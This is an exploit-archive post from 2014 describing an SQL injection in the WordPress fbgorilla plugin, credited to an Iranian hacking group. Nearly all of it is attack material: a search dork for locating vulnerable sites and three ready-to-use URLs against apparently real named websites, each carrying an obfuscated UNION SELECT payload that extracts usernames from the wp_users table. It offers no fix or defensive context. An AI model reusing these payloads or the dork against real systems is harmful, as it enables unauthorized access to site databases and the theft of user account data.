Home / os / wins2003

WordPress FBGorilla SQL Injection

Posted on 29 July 2014

############## # Exploit Title : Wordpress fbgorilla plugin SQL INJECTION # # Exploit Author : Ashiyane Digital Security Team # # vendor Home : http://wordpress.org/ # # Home : www.Ashiyane.org # # Security Risk : HIgh # # Dork : inurl:wp-content/plugins/fbgorilla/game_play.php?id= # ############## #Location : wp-content/plugins/fbgorilla/game_play.php?id=[SQL] # # #Dem0: # http://online-super-store.net/wp-content/plugins/fbgorilla/game_play.php?id=-7+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users-- # http://hip-hop-abs.nl/wp-content/plugins/fbgorilla/game_play.php?id=-233+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users-- # http://fbgorilla.mobilemarketcreator.com/wp-content/plugins/fbgorilla/game_play.php?id=-233+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users-- ############## #Greetz to: My Lord ALLAH ############## # # Amirh03in # ##############

 

TOP